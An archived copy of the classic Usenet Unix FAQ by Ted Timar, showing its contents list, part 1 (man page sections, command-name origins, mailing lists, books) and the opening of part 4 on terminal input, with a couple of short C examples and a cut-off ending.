From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (Contents) [Frequent posting]
|
||||
Date: 11 May 2004 10:49:59 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/contents
|
||||
Version: $Id: contents,v 2.9 1996/06/11 13:08:13 tmatimar Exp $
|
||||
|
||||
The following seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again; they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) A comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
The following questions are answered:
|
||||
|
||||
1.1) Who helped you put this list together?
|
||||
1.2) When someone refers to 'rn(1)' or 'ctime(3)', what does
|
||||
the number in parentheses mean?
|
||||
1.3) What does {some strange unix command name} stand for?
|
||||
1.4) How does the gateway between "comp.unix.questions" and the
|
||||
"info-unix" mailing list work?
|
||||
1.5) What are some useful Unix or C books?
|
||||
1.6) What happened to the pronunciation list that used to be
|
||||
part of this document?
|
||||
|
||||
2.1) How do I remove a file whose name begins with a "-" ?
|
||||
2.2) How do I remove a file with funny characters in the filename ?
|
||||
2.3) How do I get a recursive directory listing?
|
||||
2.4) How do I get the current directory into my prompt?
|
||||
2.5) How do I read characters from the terminal in a shell script?
|
||||
2.6) How do I rename "*.foo" to "*.bar", or change file names
|
||||
to lowercase?
|
||||
2.7) Why do I get [some strange error message] when I
|
||||
"rsh host command" ?
|
||||
2.8) How do I {set an environment variable, change directory} inside a
|
||||
program or shell script and have that change affect my
|
||||
current shell?
|
||||
2.9) How do I redirect stdout and stderr separately in csh?
|
||||
2.10) How do I tell inside .cshrc if I'm a login shell?
|
||||
2.11) How do I construct a shell glob-pattern that matches all files
|
||||
except "." and ".." ?
|
||||
2.12) How do I find the last argument in a Bourne shell script?
|
||||
2.13) What's wrong with having '.' in your $PATH ?
|
||||
2.14) How do I ring the terminal bell during a shell script?
|
||||
2.15) Why can't I use "talk" to talk with my friend on machine X?
|
||||
2.16) Why does calendar produce the wrong output?
|
||||
|
||||
3.1) How do I find the creation time of a file?
|
||||
3.2) How do I use "rsh" without having the rsh hang around
|
||||
until the remote command has completed?
|
||||
3.3) How do I truncate a file?
|
||||
3.4) Why doesn't find's "{}" symbol do what I want?
|
||||
3.5) How do I set the permissions on a symbolic link?
|
||||
3.6) How do I "undelete" a file?
|
||||
3.7) How can a process detect if it's running in the background?
|
||||
3.8) Why doesn't redirecting a loop work as intended? (Bourne shell)
|
||||
3.9) How do I run 'passwd', 'ftp', 'telnet', 'tip' and other interactive
|
||||
programs from a shell script or in the background?
|
||||
3.10) How do I find the process ID of a program with a particular
|
||||
name from inside a shell script or C program?
|
||||
3.11) How do I check the exit status of a remote command
|
||||
executed via "rsh" ?
|
||||
3.12) Is it possible to pass shell variable settings into an awk program?
|
||||
3.13) How do I get rid of zombie processes that persevere?
|
||||
3.14) How do I get lines from a pipe as they are written instead of
|
||||
only in larger blocks?
|
||||
3.15) How do I get the date into a filename?
|
||||
3.16) Why do some scripts start with #! ... ?
|
||||
|
||||
4.1) How do I read characters from a terminal without requiring the user
|
||||
to hit RETURN?
|
||||
4.2) How do I check to see if there are characters to be read without
|
||||
actually reading?
|
||||
4.3) How do I find the name of an open file?
|
||||
4.4) How can an executing program determine its own pathname?
|
||||
4.5) How do I use popen() to open a process for reading AND writing?
|
||||
4.6) How do I sleep() in a C program for less than one second?
|
||||
4.7) How can I get setuid shell scripts to work?
|
||||
4.8) How can I find out which user or process has a file open or is using
|
||||
a particular file system (so that I can unmount it)?
|
||||
4.9) How do I keep track of people who are fingering me?
|
||||
4.10) Is it possible to reconnect a process to a terminal after it has
|
||||
been disconnected, e.g. after starting a program in the background
|
||||
and logging out?
|
||||
4.11) Is it possible to "spy" on a terminal, displaying the output
|
||||
that's appearing on it on another terminal?
|
||||
|
||||
5.1) Can shells be classified into categories?
|
||||
5.2) How do I "include" one shell script from within another
|
||||
shell script?
|
||||
5.3) Do all shells have aliases? Is there something else that
|
||||
can be used?
|
||||
5.4) How are shell variables assigned?
|
||||
5.5) How can I tell if I am running an interactive shell?
|
||||
5.6) What "dot" files do the various shells use?
|
||||
5.7) I would like to know more about the differences between the
|
||||
various shells. Is this information available some place?
|
||||
|
||||
6.1) Disclaimer and introduction.
|
||||
6.2) A very brief look at Unix history.
|
||||
6.3) Main Unix flavors.
|
||||
6.4) Main Players and Unix Standards.
|
||||
6.5) Identifying your Unix flavor.
|
||||
6.6) Brief notes on some well-known (commercial/PD) Unices.
|
||||
6.7) Real-time Unices.
|
||||
6.8) Unix glossary.
|
||||
6.9) Acknowledgements.
|
||||
|
||||
7.1) RCS vs SCCS: Introduction
|
||||
7.2) RCS vs SCCS: How do the interfaces compare?
|
||||
7.3) RCS vs SCCS: What's in a Revision File?
|
||||
7.4) RCS vs SCCS: What are the keywords?
|
||||
7.5) What's an RCS symbolic name?
|
||||
7.6) RCS vs SCCS: How do they compare for performance?
|
||||
7.7) RCS vs SCCS: Version Identification.
|
||||
7.8) RCS vs SCCS: How do they deal with problems?
|
||||
7.9) RCS vs SCCS: How do they interact with make(1)?
|
||||
7.10) RCS vs SCCS: Conversion.
|
||||
7.11) RCS vs SCCS: Support
|
||||
7.12) RCS vs SCCS: Command Comparison
|
||||
7.13) RCS vs SCCS: Acknowledgements
|
||||
7.14) Can I get more information on configuration management systems?
|
||||
|
||||
If you're looking for the answer to, say, question 2.5, look in
|
||||
part 2 and search for the regular expression "^2.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
corrections for any of these answers, please send them to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
@@ -0,0 +1,427 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:07:15+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (1-7) ======
|
||||
Created 星期二 07 六月 2011
|
||||
http://www.faqs.org/faqs/unix-faq/faq/part1/
|
||||
Message-ID: <unix-faq/faq/part1_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (1/7) [Frequent posting]
|
||||
Date: 11 May 2004 10:49:59 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/part1
|
||||
Version: $Id: part1,v 2.9 1996/06/11 13:07:56 tmatimar Exp $
|
||||
|
||||
These seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again; they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) A comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
This article includes answers to:
|
||||
|
||||
1.1) Who helped you put this list together?
|
||||
1.2) When someone refers to 'rn(1)' or 'ctime(3)', what does
|
||||
the number in parentheses mean?
|
||||
1.3) What does {some strange unix command name} stand for?
|
||||
1.4) How does the gateway between "comp.unix.questions" and the
|
||||
"info-unix" mailing list work?
|
||||
1.5) What are some useful Unix or C books?
|
||||
1.6) What happened to the pronunciation list that used to be
|
||||
part of this document?
|
||||
|
||||
If you're looking for the answer to, say, question 1.5, and want to skip
|
||||
everything else, you can search ahead for the regular expression "^1.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
corrections for any of these answers, please send them to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
|
||||
|
||||
Subject: Who helped you put this list together?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.1) Who helped you put this list together?
|
||||
|
||||
This document was one of the first collections of Frequently Asked
|
||||
Questions. It was originally compiled in July 1989.
|
||||
|
||||
I took over the maintenance of this list. Almost all of the work
|
||||
(and the credit) for generating this compilation belongs to
|
||||
Steve Hayman.
|
||||
|
||||
We also owe a great deal of thanks to dozens of Usenet readers who
|
||||
submitted questions, answers, corrections and suggestions for this
|
||||
list. Special thanks go to Maarten Litmaath, Guy Harris and
|
||||
Jonathan Kamens, who have all made many especially valuable
|
||||
contributions.
|
||||
|
||||
Part 5 of this document (shells) was written almost entirely by
|
||||
Matthew Wicks <wicks@dcdmjw.fnal.gov>.
|
||||
|
||||
Part 6 of this document (Unix flavours) was written almost entirely by
|
||||
Pierre (P.) Lewis <lew@bnr.ca>.
|
||||
|
||||
Where possible the author of each question and the date it was last
|
||||
updated are given at the top. Unfortunately, I only started this
|
||||
practice recently, and much of the information is lost. I was also
|
||||
negligent in keeping track of who provided updates to questions.
|
||||
Sorry to those who have made valuable contributions, but did not
|
||||
receive the credit and recognition that they legitimately deserve.
|
||||
|
||||
I make this document available in *roff format (ms and mm macro
|
||||
packages). Andrew Cromarty has also converted it into Texinfo format.
|
||||
Marty Leisner <leisner@sdsp.mc.xerox.com> cleaned up the Texinfo
|
||||
version.
|
||||
|
||||
Major contributors to this document who may or may not be
|
||||
recognized elsewhere are:
|
||||
|
||||
Steve Hayman <shayman@Objectario.com>
|
||||
Pierre Lewis <lew@bnr.ca>
|
||||
Jonathan Kamens <jik@mit.edu>
|
||||
Tom Christiansen <tchrist@mox.perl.com>
|
||||
Maarten Litmaath <maart@nat.vu.nl>
|
||||
Guy Harris <guy@auspex.com>
|
||||
|
||||
The formatted versions are available for anonymous ftp from
|
||||
ftp.wg.omron.co.jp under pub/unix-faq/docs .
|
||||
|
||||
|
||||
|
||||
Subject: When someone refers to 'rn(1)' ... the number in parentheses mean?
|
||||
Date: Tue, 13 Dec 1994 16:37:26 -0500
|
||||
|
||||
1.2) When someone refers to 'rn(1)' or 'ctime(3)', what does
|
||||
the number in parentheses mean?
|
||||
|
||||
It looks like some sort of function call, but it isn't. These
|
||||
numbers refer to the section of the "Unix manual" where the
|
||||
appropriate documentation can be found. You could type
|
||||
"man 3 ctime" to look up the manual page for "ctime" in section 3
|
||||
of the manual.
|
||||
|
||||
The traditional manual sections are:
|
||||
|
||||
1 User-level commands
|
||||
2 System calls
|
||||
3 Library functions
|
||||
4 Devices and device drivers
|
||||
5 File formats
|
||||
6 Games
|
||||
7 Various miscellaneous stuff - macro packages etc.
|
||||
8 System maintenance and operation commands
|
||||
|
||||
Some Unix versions use non-numeric section names. For instance,
|
||||
Xenix uses "C" for commands and "S" for functions. Some newer
|
||||
versions of Unix require "man -s# title" instead of "man # title".
|
||||
|
||||
Each section has an introduction, which you can read with "man #
|
||||
intro" where # is the section number.
|
||||
|
||||
Sometimes the number is necessary to differentiate between a
|
||||
command and a library routine or system call of the same name.
|
||||
For instance, your system may have "time(1)", a manual page about
|
||||
the 'time' command for timing programs, and also "time(3)", a
|
||||
manual page about the 'time' subroutine for determining the
|
||||
current time. You can use "man 1 time" or "man 3 time" to
|
||||
specify which "time" man page you're interested in.
|
||||
|
||||
You'll often find other sections for local programs or even
|
||||
subsections of the sections above - Ultrix has sections 3m, 3n,
|
||||
3x and 3yp among others.
|
||||
|
||||
|
||||
|
||||
Subject: What does {some strange unix command name} stand for?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.3) What does {some strange unix command name} stand for?
|
||||
|
||||
awk = "Aho Weinberger and Kernighan"
|
||||
|
||||
This language was named by its authors, Al Aho, Peter
|
||||
Weinberger and Brian Kernighan.
|
||||
|
||||
grep = "Global Regular Expression Print"
|
||||
|
||||
grep comes from the ed command to print all lines matching a
|
||||
certain pattern
|
||||
|
||||
g/re/p
|
||||
|
||||
where "re" is a "regular expression".
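
To make the g/re/p idea concrete, here is a small sketch that prints every line of a string matching a regular expression. It assumes a POSIX system with <regex.h>, and it is not how grep itself is implemented. The name print_matching_lines is made up for this example.

```c
#include <regex.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: print each line of text that matches pattern (a
   POSIX basic regular expression). Returns the number of matching lines,
   or -1 if the pattern does not compile. Lines longer than 255 characters
   are truncated before matching, to keep the sketch short. */
int print_matching_lines(const char *pattern, const char *text)
{
    regex_t re;
    int matches = 0;

    if (regcomp(&re, pattern, REG_NOSUB) != 0)
        return -1;

    while (*text != '\0') {
        char line[256];
        size_t len = strcspn(text, "\n");   /* length of the current line */
        size_t copy = len < sizeof line - 1 ? len : sizeof line - 1;

        memcpy(line, text, copy);
        line[copy] = '\0';

        /* "g" = every line, "re" = the pattern, "p" = print on a match. */
        if (regexec(&re, line, 0, NULL, 0) == 0) {
            puts(line);
            matches++;
        }

        text += len;
        if (*text == '\n')
            text++;                         /* step over the newline */
    }

    regfree(&re);
    return matches;
}
```

Passing REG_EXTENDED as well as REG_NOSUB to regcomp would select the extended syntax that egrep accepts.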
|
||||
|
||||
fgrep = "Fixed GREP".
|
||||
|
||||
fgrep searches for fixed strings only. The "f" does not stand
|
||||
for "fast" - in fact, "fgrep foobar *.c" is usually slower than
|
||||
"egrep foobar *.c" (Yes, this is kind of surprising. Try it.)
|
||||
|
||||
Fgrep still has its uses though, and may be useful when searching
|
||||
a file for a larger number of strings than egrep can handle.
|
||||
|
||||
egrep = "Extended GREP"
|
||||
|
||||
egrep uses fancier regular expressions than grep. Many people
|
||||
use egrep all the time, since it has some more sophisticated
|
||||
internal algorithms than grep or fgrep, and is usually the
|
||||
fastest of the three programs.
|
||||
|
||||
cat = "CATenate"
|
||||
|
||||
catenate is an obscure word meaning "to connect in a series",
|
||||
which is what the "cat" command does to one or more files. Not
|
||||
to be confused with C/A/T, the Computer Aided Typesetter.
|
||||
|
||||
gecos = "General Electric Comprehensive Operating Supervisor"
|
||||
|
||||
When GE's large systems division was sold to Honeywell,
|
||||
Honeywell dropped the "E" from "GECOS".
|
||||
|
||||
Unix's password file has a "pw_gecos" field. The name is a
|
||||
real holdover from the early days. Dennis Ritchie has reported:
|
||||
|
||||
"Sometimes we sent printer output or batch jobs
|
||||
to the GCOS machine. The gcos field in the password file
|
||||
was a place to stash the information for the $IDENT card.
|
||||
Not elegant."
|
||||
|
||||
nroff = "New ROFF"
|
||||
troff = "Typesetter new ROFF"
|
||||
|
||||
These are descendants of "roff", which was a re-implementation
|
||||
of the Multics "runoff" program (a program that you'd use to
|
||||
"run off" a good copy of a document).
|
||||
|
||||
tee = T
|
||||
|
||||
From plumbing terminology for a T-shaped pipe splitter.
|
||||
|
||||
bss = "Block Started by Symbol"
|
||||
|
||||
Dennis Ritchie says:
|
||||
|
||||
Actually the acronym (in the sense we took it up; it may
|
||||
have other credible etymologies) is "Block Started by
|
||||
Symbol." It was a pseudo-op in FAP (Fortran Assembly [-er?]
|
||||
Program), an assembler for the IBM 704-709-7090-7094
|
||||
machines. It defined its label and set aside space for a
|
||||
given number of words. There was another pseudo-op, BES,
|
||||
"Block Ended by Symbol" that did the same except that the
|
||||
label was defined by the last assigned word + 1. (On these
|
||||
machines Fortran arrays were stored backwards in storage
|
||||
and were 1-origin.)
|
||||
|
||||
The usage is reasonably appropriate, because just as with
|
||||
standard Unix loaders, the space assigned didn't have to be
|
||||
punched literally into the object deck but was represented
|
||||
by a count somewhere.
|
||||
|
||||
biff = "BIFF"
|
||||
|
||||
This command, which turns on asynchronous mail notification,
|
||||
was actually named after a dog at Berkeley.
|
||||
|
||||
I can confirm the origin of biff, if you're interested.
|
||||
Biff was Heidi Stettner's dog, back when Heidi (and I, and
|
||||
Bill Joy) were all grad students at U.C. Berkeley and the
|
||||
early versions of BSD were being developed. Biff was
|
||||
popular among the residents of Evans Hall, and was known
|
||||
for barking at the mailman, hence the name of the command.
|
||||
|
||||
Confirmation courtesy of Eric Cooper, Carnegie Mellon University
|
||||
|
||||
rc (as in ".cshrc" or "/etc/rc") = "RunCom"
|
||||
|
||||
"rc" derives from "runcom", from the MIT CTSS system, ca. 1965.
|
||||
|
||||
'There was a facility that would execute a bunch of
|
||||
commands stored in a file; it was called "runcom" for "run
|
||||
commands", and the file began to be called "a runcom."
|
||||
|
||||
"rc" in Unix is a fossil from that usage.'
|
||||
|
||||
Brian Kernighan & Dennis Ritchie, as told to Vicki Brown
|
||||
|
||||
"rc" is also the name of the shell from the new Plan 9
|
||||
operating system.
|
||||
|
||||
Perl = "Practical Extraction and Report Language"
|
||||
Perl = "Pathologically Eclectic Rubbish Lister"
|
||||
|
||||
The Perl language is Larry Wall's highly popular
|
||||
freely-available completely portable text, process, and file
|
||||
manipulation tool that bridges the gap between shell and C
|
||||
programming (or between doing it on the command line and
|
||||
pulling your hair out). For further information, see the
|
||||
Usenet newsgroup comp.lang.perl.misc.
|
||||
|
||||
Don Libes' book "Life with Unix" contains lots more of these
|
||||
tidbits.
|
||||
|
||||
|
||||
|
||||
Subject: How does the gateway between "comp.unix.questions" ... work ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.4) How does the gateway between "comp.unix.questions" and the
|
||||
"info-unix" mailing list work?
|
||||
|
||||
"info-unix" and "unix-wizards" are mailing list versions of
|
||||
comp.unix.questions and comp.unix.wizards respectively.
|
||||
There should be no difference in content between the
|
||||
mailing list and the newsgroup.
|
||||
|
||||
To get on or off either of these lists, send mail to
|
||||
info-unix-request@brl.mil or unix-wizards-request@brl.mil.
|
||||
Be sure to use the '-Request'. Don't expect an immediate response.
|
||||
|
||||
Here are the gory details, courtesy of the list's maintainer,
|
||||
Bob Reschly.
|
||||
|
||||
==== postings to info-UNIX and UNIX-wizards lists ====
|
||||
|
||||
Anything submitted to the list is posted; I do not moderate
|
||||
incoming traffic -- BRL functions as a reflector. Postings
|
||||
submitted by Internet subscribers should be addressed to the list
|
||||
address (info-UNIX or UNIX-wizards); the '-request' addresses
|
||||
are for correspondence with the list maintainer [me]. Postings
|
||||
submitted by USENET readers should be addressed to the
|
||||
appropriate news group (comp.unix.questions or
|
||||
comp.unix.wizards).
|
||||
|
||||
For Internet subscribers, received traffic will be of two types;
|
||||
individual messages, and digests. Traffic which comes to BRL
|
||||
from the Internet and BITNET (via the BITNET-Internet gateway) is
|
||||
immediately resent to all addressees on the mailing list.
|
||||
Traffic originating on USENET is gathered up into digests which
|
||||
are sent to all list members daily.
|
||||
|
||||
BITNET traffic is much like Internet traffic. The main
|
||||
difference is that I maintain only one address for traffic
|
||||
destined to all BITNET subscribers. That address points to a list
|
||||
exploder which then sends copies to individual BITNET
|
||||
subscribers. This way only one copy of a given message has to
|
||||
cross the BITNET-Internet gateway in either direction.
|
||||
|
||||
USENET subscribers see only individual messages. All messages
|
||||
originating on the Internet side are forwarded to our USENET
|
||||
machine. They are then posted to the appropriate newsgroup.
|
||||
Unfortunately, for gatewayed messages, the sender becomes
|
||||
"news@brl-adm". This is currently an unavoidable side-effect of
|
||||
the software which performs the gateway function.
|
||||
|
||||
As for readership, USENET has an extremely large readership - I
|
||||
would guess several thousand hosts and tens of thousands of
|
||||
readers. The master list maintained here at BRL runs about two
|
||||
hundred fifty entries with roughly ten percent of those being
|
||||
local redistribution lists. I don't have a good feel for the
|
||||
size of the BITNET redistribution, but I would guess it is
|
||||
roughly the same size and composition as the master list.
|
||||
Traffic runs 150K to 400K bytes per list per week on average.
|
||||
|
||||
|
||||
|
||||
Subject: What are some useful Unix or C books?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.5) What are some useful Unix or C books?
|
||||
|
||||
Mitch Wright (mitch@cirrus.com) maintains a useful list of Unix
|
||||
and C books, with descriptions and some mini-reviews. There are
|
||||
currently 167 titles on his list.
|
||||
|
||||
You can obtain a copy of this list by anonymous ftp from
|
||||
ftp.rahul.net (192.160.13.1), where it's "pub/mitch/YABL/yabl".
|
||||
Send additions or suggestions to mitch@cirrus.com.
|
||||
|
||||
Samuel Ko (kko@sfu.ca) maintains another list of Unix books.
|
||||
This list contains only recommended books, and is therefore
|
||||
somewhat shorter. This list is also a classified list, with
|
||||
books grouped into categories, which may be better if you are
|
||||
looking for a specific type of book.
|
||||
|
||||
You can obtain a copy of this list by anonymous ftp from
|
||||
rtfm.mit.edu, where it's "pub/usenet/news.answers/books/unix".
|
||||
Send additions or suggestions to kko@sfu.ca.
|
||||
|
||||
If you can't use anonymous ftp, email the line "help" to
|
||||
"ftpmail@decwrl.dec.com" for instructions on retrieving
|
||||
things via email.
|
||||
|
||||
|
||||
|
||||
Subject: What happened to the pronunciation list ... ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.6) What happened to the pronunciation list that used to be part of this
|
||||
document?
|
||||
|
||||
From its inception in 1989, this FAQ document included a
|
||||
comprehensive pronunciation list maintained by Maarten Litmaath
|
||||
(thanks, Maarten!). It was originally created by Carl Paukstis
|
||||
<carlp@frigg.isc-br.com>.
|
||||
|
||||
It has been retired, since it is not really relevant to the topic
|
||||
of "Unix questions". You can still find it as part of the
|
||||
widely-distributed "Jargon" file (maintained by Eric S. Raymond,
|
||||
eric@snark.thyrsus.com) which seems like a much more appropriate
|
||||
forum for the topic of "How do you pronounce /* ?"
|
||||
|
||||
If you'd like a copy, you can ftp one from ftp.wg.omron.co.jp
|
||||
(133.210.4.4), it's "pub/unix-faq/docs/Pronunciation-Guide".
|
||||
|
||||
------------------------------
|
||||
|
||||
End of unix/faq Digest part 1 of 7
|
||||
**********************************
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
@@ -0,0 +1,677 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:10:03+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (4-7) ======
|
||||
Created Tuesday 07 June 2011
|
||||
Message-ID: <unix-faq/faq/part4_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (4/7) [Frequent posting]
|
||||
Date: 11 May 2004 10:50:00 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/part4
|
||||
Version: $Id: part4,v 2.9 1996/06/11 13:07:56 tmatimar Exp $
|
||||
|
||||
These seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again, they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) A comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
This article includes answers to:
|
||||
|
||||
4.1) How do I read characters from a terminal without requiring the user
|
||||
to hit RETURN?
|
||||
4.2) How do I check to see if there are characters to be read without
|
||||
actually reading?
|
||||
4.3) How do I find the name of an open file?
|
||||
4.4) How can an executing program determine its own pathname?
|
||||
4.5) How do I use popen() to open a process for reading AND writing?
|
||||
4.6) How do I sleep() in a C program for less than one second?
|
||||
4.7) How can I get setuid shell scripts to work?
|
||||
4.8) How can I find out which user or process has a file open or is using
|
||||
a particular file system (so that I can unmount it?)
|
||||
4.9) How do I keep track of people who are fingering me?
|
||||
4.10) Is it possible to reconnect a process to a terminal after it has
|
||||
been disconnected, e.g. after starting a program in the background
|
||||
and logging out?
|
||||
4.11) Is it possible to "spy" on a terminal, displaying the output
|
||||
that's appearing on it on another terminal?
|
||||
|
||||
If you're looking for the answer to, say, question 4.5, and want to skip
|
||||
everything else, you can search ahead for the regular expression "^4.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
corrections for any of these answers, please send them to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
|
||||
|
||||
Subject: How do I read characters ... without requiring the user to hit RETURN?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.1) How do I read characters from a terminal without requiring the user
|
||||
to hit RETURN?
|
||||
|
||||
Check out cbreak mode in BSD, ~ICANON mode in SysV.
|
||||
|
||||
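As a rough sketch of what "setting the terminal parameters
yourself" can look like, the functions below clear ICANON through
the POSIX termios calls tcgetattr() and tcsetattr(). This assumes
a system that provides <termios.h>; older systems would use the
equivalent ioctl(2) requests instead. The names enter_cbreak()
and leave_cbreak() are made up for this example.

```c
#include <termios.h>
#include <unistd.h>

/* Put the terminal on fd into a cbreak-like mode: no line buffering,
 * so read() returns as soon as one byte is available.  The previous
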